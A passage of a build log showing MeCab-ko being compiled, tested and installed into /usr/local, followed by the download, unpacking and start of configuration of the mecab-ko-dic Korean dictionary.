-DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c char_property.cpp -o char_property.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary.lo dictionary.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary.cpp -fPIC -DPIC -o .libs/dictionary.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary.cpp -o dictionary.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o feature_index.lo feature_index.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c feature_index.cpp -fPIC -DPIC -o .libs/feature_index.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c feature_index.cpp -o feature_index.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o lbfgs.lo lbfgs.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c lbfgs.cpp -fPIC -DPIC -o .libs/lbfgs.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c lbfgs.cpp -o lbfgs.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o learner_tagger.lo learner_tagger.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner_tagger.cpp -fPIC -DPIC -o .libs/learner_tagger.o\n\u001b[01m\u001b[Klearner_tagger.cpp:25:7:\u001b[m\u001b[K \u001b[01;35m\u001b[Kwarning: \u001b[m\u001b[K'\u001b[01m\u001b[Kchar* MeCab::{anonymous}::mystrdup(const string&)\u001b[m\u001b[K' defined but not used [\u001b[01;35m\u001b[K-Wunused-function\u001b[m\u001b[K]\n char *\u001b[01;35m\u001b[Kmystrdup\u001b[m\u001b[K(const std::string &str) {\n \u001b[01;35m\u001b[K^~~~~~~~\u001b[m\u001b[K\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner_tagger.cpp -o learner_tagger.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o learner.lo learner.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner.cpp -fPIC -DPIC -o .libs/learner.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner.cpp -o learner.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o libmecab.lo libmecab.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c libmecab.cpp -fPIC -DPIC -o .libs/libmecab.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c libmecab.cpp -o libmecab.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -no-undefined -version-info 2:0:0 -o libmecab.la -rpath /usr/local/lib viterbi.lo tagger.lo utils.lo eval.lo iconv_utils.lo dictionary_rewriter.lo dictionary_generator.lo dictionary_compiler.lo context_id.lo connector.lo nbest_generator.lo writer.lo string_buffer.lo param.lo tokenizer.lo char_property.lo dictionary.lo feature_index.lo lbfgs.lo learner_tagger.lo learner.lo libmecab.lo -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -fPIC -DPIC -shared -nostdlib /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o .libs/viterbi.o .libs/tagger.o .libs/utils.o .libs/eval.o .libs/iconv_utils.o .libs/dictionary_rewriter.o .libs/dictionary_generator.o .libs/dictionary_compiler.o .libs/context_id.o .libs/connector.o .libs/nbest_generator.o .libs/writer.o .libs/string_buffer.o .libs/param.o .libs/tokenizer.o .libs/char_property.o .libs/dictionary.o .libs/feature_index.o .libs/lbfgs.o .libs/learner_tagger.o .libs/learner.o .libs/libmecab.o -lpthread -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/local/cuda/lib64/stubs -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. 
-lstdc++ -lm -lc -lgcc_s /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o -O3 -Wl,-soname -Wl,libmecab.so.2 -o .libs/libmecab.so.2.0.0\nlibtool: link: (cd \".libs\" && rm -f \"libmecab.so.2\" && ln -s \"libmecab.so.2.0.0\" \"libmecab.so.2\")\nlibtool: link: (cd \".libs\" && rm -f \"libmecab.so\" && ln -s \"libmecab.so.2.0.0\" \"libmecab.so\")\nlibtool: link: ar cru .libs/libmecab.a viterbi.o tagger.o utils.o eval.o iconv_utils.o dictionary_rewriter.o dictionary_generator.o dictionary_compiler.o context_id.o connector.o nbest_generator.o writer.o string_buffer.o param.o tokenizer.o char_property.o dictionary.o feature_index.o lbfgs.o learner_tagger.o learner.o libmecab.o\nar: `u' modifier ignored since `D' is the default (see `U')\nlibtool: link: ranlib .libs/libmecab.a\nlibtool: link: ( cd \".libs\" && rm -f \"libmecab.la\" && ln -s \"../libmecab.la\" \"libmecab.la\" )\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab.o mecab.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab mecab.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab mecab.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-dict-index.o mecab-dict-index.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-dict-index mecab-dict-index.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-dict-index mecab-dict-index.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-dict-gen.o mecab-dict-gen.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-dict-gen mecab-dict-gen.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-dict-gen mecab-dict-gen.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-cost-train.o mecab-cost-train.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-cost-train mecab-cost-train.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-cost-train mecab-cost-train.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-system-eval.o mecab-system-eval.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-system-eval mecab-system-eval.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-system-eval mecab-system-eval.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-test-gen.o mecab-test-gen.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-test-gen mecab-test-gen.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-test-gen mecab-test-gen.o ./.libs/libmecab.so -lpthread -lstdc++\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking all in man\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking all in doc\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking all in tests\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking check in src\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking check in man\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking check in doc\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking check in tests\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake check-TESTS\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 
2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 177\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 178x178\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 83\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 84x84\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 450\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 162\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 3x3\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 
4\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 11\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 1\nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 1\nreading ./matrix.def ... 1x1\n\ndone!\nPASS: run-dics.sh\nPASS: run-eval.sh\nseed/pos-id.def is not found. minimum setting is used\nreading seed/unk.def ... 40\nemitting double-array: 100% |###########################################| \nseed/model.def is not found. skipped.\nseed/pos-id.def is not found. minimum setting is used\nreading seed/dic.csv ... 4335\nemitting double-array: 100% |###########################################| \nreading seed/matrix.def ... 
1x1\n\ndone!\nreading corpus ...\nNumber of sentences: 34\nNumber of features: 64108\neta: 0.00005\nfreq: 1\neval-size: 6\nunk-eval-size: 4\nthreads: 1\ncharset: EUC-JP\nC(sigma^2): 1.00000\n\niter=0 err=1.00000 F=0.35771 target=2406.28355 diff=1.00000\niter=1 err=0.97059 F=0.65652 target=1484.25231 diff=0.38318\niter=2 err=0.91176 F=0.79331 target=863.32765 diff=0.41834\niter=3 err=0.85294 F=0.89213 target=596.72480 diff=0.30881\niter=4 err=0.61765 F=0.95467 target=336.30744 diff=0.43641\niter=5 err=0.50000 F=0.96702 target=246.53039 diff=0.26695\niter=6 err=0.35294 F=0.95472 target=188.93963 diff=0.23361\niter=7 err=0.20588 F=0.99106 target=168.62665 diff=0.10751\niter=8 err=0.05882 F=0.99777 target=158.64865 diff=0.05917\niter=9 err=0.08824 F=0.99665 target=154.14530 diff=0.02839\niter=10 err=0.08824 F=0.99665 target=151.94257 diff=0.01429\niter=11 err=0.02941 F=0.99888 target=147.20825 diff=0.03116\niter=12 err=0.00000 F=1.00000 target=147.34956 diff=0.00096\niter=13 err=0.02941 F=0.99888 target=146.32592 diff=0.00695\niter=14 err=0.00000 F=1.00000 target=145.77299 diff=0.00378\niter=15 err=0.02941 F=0.99888 target=145.24641 diff=0.00361\niter=16 err=0.00000 F=1.00000 target=144.96490 diff=0.00194\niter=17 err=0.02941 F=0.99888 target=144.90246 diff=0.00043\niter=18 err=0.00000 F=1.00000 target=144.75959 diff=0.00099\niter=19 err=0.00000 F=1.00000 target=144.71727 diff=0.00029\niter=20 err=0.00000 F=1.00000 target=144.66337 diff=0.00037\niter=21 err=0.00000 F=1.00000 target=144.61349 diff=0.00034\niter=22 err=0.00000 F=1.00000 target=144.62987 diff=0.00011\niter=23 err=0.00000 F=1.00000 target=144.60060 diff=0.00020\niter=24 err=0.00000 F=1.00000 target=144.59125 diff=0.00006\niter=25 err=0.00000 F=1.00000 target=144.58619 diff=0.00004\niter=26 err=0.00000 F=1.00000 target=144.58219 diff=0.00003\niter=27 err=0.00000 F=1.00000 target=144.58059 diff=0.00001\n\nDone! writing model file ... \nmodel-ipadic.c1.0.f1.model is not a binary model. 
reopen it as text mode...\nreading seed/unk.def ... 40\nreading seed/dic.csv ... 4335\nemitting model-ipadic.c1.0.f1.dic/left-id.def/ model-ipadic.c1.0.f1.dic/right-id.def\nemitting model-ipadic.c1.0.f1.dic/unk.def ... 40\nemitting model-ipadic.c1.0.f1.dic/dic.csv ... 4335\nemitting matrix : 100% |###########################################| \ncopying seed/char.def to model-ipadic.c1.0.f1.dic/char.def\ncopying seed/rewrite.def to model-ipadic.c1.0.f1.dic/rewrite.def\ncopying seed/dicrc to model-ipadic.c1.0.f1.dic/dicrc\ncopying seed/feature.def to model-ipadic.c1.0.f1.dic/feature.def\ncopying model-ipadic.c1.0.f1.model to model-ipadic.c1.0.f1.dic/model.def\n\ndone!\nmodel-ipadic.c1.0.f1.dic/pos-id.def is not found. minimum setting is used\nreading model-ipadic.c1.0.f1.dic/unk.def ... 40\nemitting double-array: 100% |###########################################| \nmodel-ipadic.c1.0.f1.dic/pos-id.def is not found. minimum setting is used\nreading model-ipadic.c1.0.f1.dic/dic.csv ... 4335\nemitting double-array: 100% |###########################################| \nreading model-ipadic.c1.0.f1.dic/matrix.def ... 
346x346\nemitting matrix : 100% |###########################################| \n\ndone!\n precision recall F\nLEVEL 0: 12.8959(57/442) 11.8998(57/479) 12.3779\nLEVEL 1: 12.2172(54/442) 11.2735(54/479) 11.7264\nLEVEL 2: 11.7647(52/442) 10.8559(52/479) 11.2921\nLEVEL 4: 11.7647(52/442) 10.8559(52/479) 11.2921\nPASS: run-cost-train.sh\n==================\nAll 3 tests passed\n==================\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking install in src\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\ntest -z \"/usr/local/lib\" || /bin/mkdir -p \"/usr/local/lib\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c libmecab.la '/usr/local/lib'\nlibtool: install: /usr/bin/install -c .libs/libmecab.so.2.0.0 /usr/local/lib/libmecab.so.2.0.0\nlibtool: install: (cd /usr/local/lib && { ln -s -f libmecab.so.2.0.0 libmecab.so.2 || { rm -f libmecab.so.2 && ln -s libmecab.so.2.0.0 libmecab.so.2; }; })\nlibtool: install: (cd /usr/local/lib && { ln -s -f libmecab.so.2.0.0 libmecab.so || { rm -f libmecab.so && ln -s libmecab.so.2.0.0 libmecab.so; }; })\nlibtool: install: /usr/bin/install -c .libs/libmecab.lai /usr/local/lib/libmecab.la\nlibtool: install: /usr/bin/install -c .libs/libmecab.a /usr/local/lib/libmecab.a\nlibtool: install: chmod 644 /usr/local/lib/libmecab.a\nlibtool: install: ranlib /usr/local/lib/libmecab.a\nlibtool: finish: PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/sbin\" ldconfig -n /usr/local/lib\n----------------------------------------------------------------------\nLibraries have been installed in:\n /usr/local/lib\n\nIf you ever happen to want to link against installed libraries\nin a given directory, LIBDIR, you must either use libtool, and\nspecify 
the full pathname of the library, or use the `-LLIBDIR'\nflag during linking and do at least one of the following:\n - add LIBDIR to the `LD_LIBRARY_PATH' environment variable\n during execution\n - add LIBDIR to the `LD_RUN_PATH' environment variable\n during linking\n - use the `-Wl,-rpath -Wl,LIBDIR' linker flag\n - have your system administrator add LIBDIR to `/etc/ld.so.conf'\n\nSee any operating system documentation about shared libraries for\nmore information, such as the ld(1) and ld.so(8) manual pages.\n----------------------------------------------------------------------\ntest -z \"/usr/local/bin\" || /bin/mkdir -p \"/usr/local/bin\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c mecab '/usr/local/bin'\nlibtool: install: /usr/bin/install -c .libs/mecab /usr/local/bin/mecab\ntest -z \"/usr/local/libexec/mecab\" || /bin/mkdir -p \"/usr/local/libexec/mecab\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c mecab-dict-index mecab-dict-gen mecab-cost-train mecab-system-eval mecab-test-gen '/usr/local/libexec/mecab'\nlibtool: install: /usr/bin/install -c .libs/mecab-dict-index /usr/local/libexec/mecab/mecab-dict-index\nlibtool: install: /usr/bin/install -c .libs/mecab-dict-gen /usr/local/libexec/mecab/mecab-dict-gen\nlibtool: install: /usr/bin/install -c .libs/mecab-cost-train /usr/local/libexec/mecab/mecab-cost-train\nlibtool: install: /usr/bin/install -c .libs/mecab-system-eval /usr/local/libexec/mecab/mecab-system-eval\nlibtool: install: /usr/bin/install -c .libs/mecab-test-gen /usr/local/libexec/mecab/mecab-test-gen\ntest -z \"/usr/local/include\" || /bin/mkdir -p \"/usr/local/include\"\n /usr/bin/install -c -m 644 mecab.h '/usr/local/include'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking install in man\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Nothing to be done for 
'install-exec-am'.\ntest -z \"/usr/local/share/man/man1\" || /bin/mkdir -p \"/usr/local/share/man/man1\"\n /usr/bin/install -c -m 644 mecab.1 '/usr/local/share/man/man1'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking install in doc\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Nothing to be done for 'install-exec-am'.\nmake[2]: Nothing to be done for 'install-data-am'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking install in tests\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Nothing to be done for 'install-exec-am'.\nmake[2]: Nothing to be done for 'install-data-am'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\ntest -z \"/usr/local/bin\" || /bin/mkdir -p \"/usr/local/bin\"\n /usr/bin/install -c mecab-config '/usr/local/bin'\ntest -z \"/usr/local/etc\" || /bin/mkdir -p \"/usr/local/etc\"\n /usr/bin/install -c -m 644 mecabrc '/usr/local/etc'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nInstall mecab-ko-dic\nInstall mecab-ko-dic\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n100 47.4M 100 47.4M 0 0 56.4M 0 --:--:-- --:--:-- --:--:-- 
168M\nmecab-ko-dic-2.1.1-20180720/\nmecab-ko-dic-2.1.1-20180720/configure\nmecab-ko-dic-2.1.1-20180720/COPYING\nmecab-ko-dic-2.1.1-20180720/autogen.sh\nmecab-ko-dic-2.1.1-20180720/Place-station.csv\nmecab-ko-dic-2.1.1-20180720/NNG.csv\nmecab-ko-dic-2.1.1-20180720/README\nmecab-ko-dic-2.1.1-20180720/EF.csv\nmecab-ko-dic-2.1.1-20180720/MAG.csv\nmecab-ko-dic-2.1.1-20180720/Preanalysis.csv\nmecab-ko-dic-2.1.1-20180720/NNB.csv\nmecab-ko-dic-2.1.1-20180720/Person-actor.csv\nmecab-ko-dic-2.1.1-20180720/VV.csv\nmecab-ko-dic-2.1.1-20180720/Makefile.in\nmecab-ko-dic-2.1.1-20180720/matrix.def\nmecab-ko-dic-2.1.1-20180720/EC.csv\nmecab-ko-dic-2.1.1-20180720/NNBC.csv\nmecab-ko-dic-2.1.1-20180720/clean\nmecab-ko-dic-2.1.1-20180720/ChangeLog\nmecab-ko-dic-2.1.1-20180720/J.csv\nmecab-ko-dic-2.1.1-20180720/.keep\nmecab-ko-dic-2.1.1-20180720/feature.def\nmecab-ko-dic-2.1.1-20180720/Foreign.csv\nmecab-ko-dic-2.1.1-20180720/XPN.csv\nmecab-ko-dic-2.1.1-20180720/EP.csv\nmecab-ko-dic-2.1.1-20180720/NR.csv\nmecab-ko-dic-2.1.1-20180720/left-id.def\nmecab-ko-dic-2.1.1-20180720/Place.csv\nmecab-ko-dic-2.1.1-20180720/Symbol.csv\nmecab-ko-dic-2.1.1-20180720/dicrc\nmecab-ko-dic-2.1.1-20180720/NP.csv\nmecab-ko-dic-2.1.1-20180720/ETM.csv\nmecab-ko-dic-2.1.1-20180720/IC.csv\nmecab-ko-dic-2.1.1-20180720/Place-address.csv\nmecab-ko-dic-2.1.1-20180720/Group.csv\nmecab-ko-dic-2.1.1-20180720/model.def\nmecab-ko-dic-2.1.1-20180720/XSN.csv\nmecab-ko-dic-2.1.1-20180720/INSTALL\nmecab-ko-dic-2.1.1-20180720/rewrite.def\nmecab-ko-dic-2.1.1-20180720/Inflect.csv\nmecab-ko-dic-2.1.1-20180720/configure.ac\nmecab-ko-dic-2.1.1-20180720/NNP.csv\nmecab-ko-dic-2.1.1-20180720/CoinedWord.csv\nmecab-ko-dic-2.1.1-20180720/XSV.csv\nmecab-ko-dic-2.1.1-20180720/pos-id.def\nmecab-ko-dic-2.1.1-20180720/Makefile.am\nmecab-ko-dic-2.1.1-20180720/unk.def\nmecab-ko-dic-2.1.1-20180720/missing\nmecab-ko-dic-2.1.1-20180720/VCP.csv\nmecab-ko-dic-2.1.1-20180720/install-sh\nmecab-ko-dic-2.1.1-20180720/Hanja.csv\nmecab-ko-dic-2.1.1-201807
20/MAJ.csv\nmecab-ko-dic-2.1.1-20180720/XSA.csv\nmecab-ko-dic-2.1.1-20180720/Wikipedia.csv\nmecab-ko-dic-2.1.1-20180720/tools/\nmecab-ko-dic-2.1.1-20180720/tools/add-userdic.sh\nmecab-ko-dic-2.1.1-20180720/tools/mecab-bestn.sh\nmecab-ko-dic-2.1.1-20180720/tools/convert_for_using_store.sh\nmecab-ko-dic-2.1.1-20180720/user-dic/\nmecab-ko-dic-2.1.1-20180720/user-dic/nnp.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/place.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/person.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/README.md\nmecab-ko-dic-2.1.1-20180720/NorthKorea.csv\nmecab-ko-dic-2.1.1-20180720/VX.csv\nmecab-ko-dic-2.1.1-20180720/right-id.def\nmecab-ko-dic-2.1.1-20180720/VA.csv\nmecab-ko-dic-2.1.1-20180720/char.def\nmecab-ko-dic-2.1.1-20180720/NEWS\nmecab-ko-dic-2.1.1-20180720/MM.csv\nmecab-ko-dic-2.1.1-20180720/ETN.csv\nmecab-ko-dic-2.1.1-20180720/AUTHORS\nmecab-ko-dic-2.1.1-20180720/Person.csv\nmecab-ko-dic-2.1.1-20180720/XR.csv\nmecab-ko-dic-2.1.1-20180720/VCN.csv\nLooking in current directory for macros.\nconfigure.ac:2: warning: AM_INIT_AUTOMAKE: two- and three-arguments forms are deprecated. For more info, see:\nconfigure.ac:2: http://www.gnu.org/software/automake/manual/automake.html#Modernize-AM_005fINIT_005fAUTOMAKE-invocation\nchecking for a BSD-compatible install... /usr/bin/install -c\nchecking whether build environment is sane... yes\n/tmp/mecab-ko-dic-2.1.1-20180720/missing: Unknown `--is-lightweight' option\nTry `/tmp/mecab-ko-dic-2.1.1-20180720/missing --help' for more information\nconfigure: WARNING: 'missing' script is too old or missing\nchecking for a thread-safe mkdir -p... /bin/mkdir -p\nchecking for gawk... no\nchecking for mawk... mawk\nchecking whether make sets $(MAKE)... yes\nchecking whether make supports nested variables... yes\nchecking for mecab-config... /usr/local/bin/mecab-config\nchecking that generated files are newer than configure... 
